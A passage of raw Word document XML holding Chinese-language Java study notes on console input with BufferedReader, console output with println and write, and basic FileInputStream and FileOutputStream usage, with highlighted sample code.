      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            System.out.println(c);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DF4EAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        } while (c != 'q');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9DBCC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D20D9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0260CDC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从控制台读取字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C1FB71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>从标准输入读取一个字符串需要使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BufferedReader </w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> readLine() </w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD7FCD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0B85F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BufferedReader </w:t>
      </w:r>
      <w:r>
        <w:t>在控制台读取字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F480D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BBCD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class BRReadLines {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26276A34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51222348" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> System.in </w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BufferedReader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B06B8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BufferedReader br = new BufferedReader(new InputStreamReader(System.in));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1AFDB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>String str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3284ABED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println("Enter lines of text.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C4778B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println("Enter 'end' to quit.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2ADE2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A0D2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            str = br.readLine();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F89DB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            System.out.println(str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC64C12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        } while (!str.equals("end"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B610DEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25603090" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633DAA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5735EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>控制台的输出由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> print( ) </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> println() </w:t>
      </w:r>
      <w:r>
        <w:t>完成。这些方法都由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> PrintStream </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">System.out </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是该类对象的一个引用</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BC53B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PrintStream </w:t>
      </w:r>
      <w:r>
        <w:t>继承了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OutputStream</w:t>
      </w:r>
      <w:r>
        <w:t>类，并且实现了方法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> write()</w:t>
      </w:r>
      <w:r>
        <w:t>。这样，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">write() </w:t>
      </w:r>
      <w:r>
        <w:t>也可以用来往控制台写操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE430B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PrintStream </w:t>
      </w:r>
      <w:r>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> write() </w:t>
      </w:r>
      <w:r>
        <w:t>的最简单格式如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D3D16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="008D4ACA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477ADA09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>演示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> System.out.write().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B5D04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class WriteDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FC4E47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4753BBE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        int b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725B8885" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        b = 'A';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9148BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>System.out.write(b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA015DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.write('\n');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1473704B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA798C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579CF896" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读写文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF97AB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>FileInputStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：文件输入流</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5B1B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以传参</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DFC79F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF9E845" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>InputStream f = new FileInputStream("C:/java/hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175059D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009243A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>File f = new File("C:/java/hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06391A69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>InputStream in = new FileInputStream(f);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B6D3FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEF4578" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public void close() throws IOException{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4548DBCB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭此文件输入流并释放与此流有关的所有系统资源。抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1724D45D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected void finalize()throws IOException {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF3B08C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个方法清除与该文件的连接。确保在不再引用文件输入流时调用其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> close </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C8F6F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public int read(int r)throws IOException{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B7A212" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个方法从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> InputStream </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象读取指定字节的数据。返回为整数值。返回下一字节数据，如果已经到结尾则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D170DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public int read(byte[] r) throws IOException{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE3D6CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个方法从输入流读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r.length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度的字节。返回读取的字节数。如果是文件结尾则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B474BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public int available() throws IOException{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEEDFF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回下一次对此输入流调用的方法可以不受阻塞地从此输入流读取的字节数。返回一个整数值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012926B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ByteArrayInputStream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387F99A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.runoob.com/java/java-bytearrayinputstream.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627F3D9E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DataInputStream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466BCAD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.runoob.com/java/java-datainputstream.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305157EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>FileOutputStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：文件输出流</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA6CCF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>该类用来创建一个文件并向文件中写数据。如果该流在打开文件进行输出前，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>目标文件不存在，那么该流会创建该文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09118CC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0152637F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>OutputStream f = new FileOutputStream("C:/java/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BFB143" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
